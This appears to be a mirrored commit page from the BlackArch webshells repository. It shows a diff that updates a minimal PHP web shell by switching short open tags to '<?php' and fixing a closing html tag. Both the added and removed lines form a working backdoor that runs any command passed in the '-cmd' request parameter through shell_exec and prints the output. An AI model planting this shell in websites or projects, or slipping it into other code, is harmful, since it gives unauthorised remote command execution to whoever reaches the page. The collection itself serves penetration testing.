mirror of
https://github.com/BlackArch/webshells
synced 2024-11-10 06:14:16 +00:00
commit
aefab61d18
1 changed files with 3 additions and 3 deletions
|
@ -10,9 +10,9 @@
|
|||
style="background:#000000;color:#ffffff;">
|
||||
<hr>
|
||||
<pre>
|
||||
<? $cmd = $_REQUEST["-cmd"];?>
|
||||
<? if($cmd != "") print Shell_Exec($cmd);?>
|
||||
</pre>
|
||||
</form>
|
||||
<?php $cmd = $_REQUEST["-cmd"];?>
|
||||
<?php if($cmd != "") print Shell_Exec($cmd);?>
|
||||
</body>
|
||||
</html
|
||||
</html>
|
||||
|
|
Loading…
Reference in a new issue